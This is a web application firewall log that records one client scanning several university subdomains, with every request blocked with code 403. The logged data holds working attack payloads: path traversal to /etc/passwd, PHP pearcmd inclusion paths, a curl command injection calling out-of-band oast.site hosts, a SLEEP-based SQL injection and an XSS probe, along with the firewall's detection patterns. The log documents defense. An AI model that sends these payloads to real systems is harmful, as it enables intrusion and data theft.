[Tue Aug 29 11:39:23.562577 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAYlCPUAAAAP"]
[Tue Aug 29 11:39:23.567702 2023] [:error] [pid 1686] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAaW4LoAAAAk"]
[Tue Aug 29 11:39:23.571201 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12e8Co-f0AAAXVy0EAAAAB"]
[Tue Aug 29 11:39:28.530198 2023] [:error] [pid 1779] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5c found within ARGS:dir: http\\x5c\\x5c..\\x5c\\x5c..\\x5c\\x5cconfig\\x5c\\x5cconfig_db.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO12gMCo-f0AAAbz2n8AAAAe"]
[Tue Aug 29 11:39:29.403499 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO12gcCo-f0AAAaJJvcAAAAJ"]
[Tue Aug 29 11:39:36.519666 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAXVy2MAAAAB"]
[Tue Aug 29 11:39:36.543567 2023] [:error] [pid 1690] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAaa-Z0AAAAp"]
[Tue Aug 29 11:39:36.549533 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafExgAAAAW"]
[Tue Aug 29 11:39:36.671219 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafEx0AAAAW"]
[Tue Aug 29 11:39:36.716192 2023] [:error] [pid 1695] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12iMCo-f0AAAafEx8AAAAW"]
[Tue Aug 29 11:39:42.557423 2023] [:error] [pid 1493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pluginName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:pluginName: ../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/go/add-on/business-continuity/api/plugin"] [unique_id "ZO12jsCo-f0AAAXVy3kAAAAB"]
[Tue Aug 29 11:39:48.034723 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAby8XIAAAAN"]
[Tue Aug 29 11:39:48.390545 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYb54QAAAAI"]
[Tue Aug 29 11:39:48.392455 2023] [:error] [pid 1499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAXbcIwAAAAL"]
[Tue Aug 29 11:39:48.401176 2023] [:error] [pid 1778] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAby8XUAAAAN"]
[Tue Aug 29 11:39:48.411088 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12lMCo-f0AAAYb54UAAAAI"]
[Tue Aug 29 11:39:51.539166 2023] [:error] [pid 1569] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:popup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:popup: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fw.progrss.details.php"] [unique_id "ZO12l8Co-f0AAAYh9cMAAAAK"]
[Tue Aug 29 11:39:56.374638 2023] [:error] [pid 1563] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAYb540AAAAI"]
[Tue Aug 29 11:39:56.440042 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaJJ2MAAAAJ"]
[Tue Aug 29 11:39:56.443619 2023] [:error] [pid 1678] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaO3fUAAAAX"]
[Tue Aug 29 11:39:56.444673 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAaHMd8AAAAE"]
[Tue Aug 29 11:39:56.482159 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:lang: ../../../../../usr/local/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12nMCo-f0AAAXQKJoAAAAj"]
[Tue Aug 29 11:40:02.438383 2023] [:error] [pid 1793] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gq7pcwbepen5uc.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcBbXkAAAAH"]
[Tue Aug 29 11:40:02.438383 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26gjhmmu9uh39h71.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAaHMeUAAAAE"]
[Tue Aug 29 11:40:02.441639 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g4tf3mng77p9mt.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcbR7YAAAAv"]
[Tue Aug 29 11:40:02.466723 2023] [:error] [pid 1818] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26grjd5yhtb1wurb.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcaVK8AAAAu"]
[Tue Aug 29 11:40:02.483006 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ip_src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ip_src: \\x22;curl cjmnbitjmimt14dgn26g9duy9j7oyde6e.oast.site #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pandora_console/index.php"] [unique_id "ZO12osCo-f0AAAcYUzgAAAAp"]
[Tue Aug 29 11:40:04.396635 2023] [:error] [pid 1803] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO12pMCo-f0AAAcL6yIAAAAM"]
[Tue Aug 29 11:40:05.517634 2023] [:error] [pid 1573] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAYlCRUAAAAP"]
[Tue Aug 29 11:40:05.524366 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAcjAgkAAAAw"]
[Tue Aug 29 11:40:05.637499 2023] [:error] [pid 1673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO12pcCo-f0AAAaJJ20AAAAJ"]
[Tue Aug 29 11:40:06.462877 2023] [:error] [pid 1488] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:lang: ../../../../../../../../../../../usr/local/lib/php/pearcmd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO12psCo-f0AAAXQKKIAAAAj"]
[Tue Aug 29 11:40:07.375491 2023] [:error] [pid 1807] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAcPivUAAAAa"]
[Tue Aug 29 11:40:07.381069 2023] [:error] [pid 1815] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAcXk2AAAAAe"]
[Tue Aug 29 11:40:07.381411 2023] [:error] [pid 1699] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:email. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:email: \\x22><script>confirm(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/guest/users/forgotten"] [unique_id "ZO12p8Co-f0AAAaj7B8AAAAq"]
[Tue Aug 29 11:40:07.384740 2023] [:error] [pid 1671] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO12p8Co-f0AAAaHMecAAAAE"]
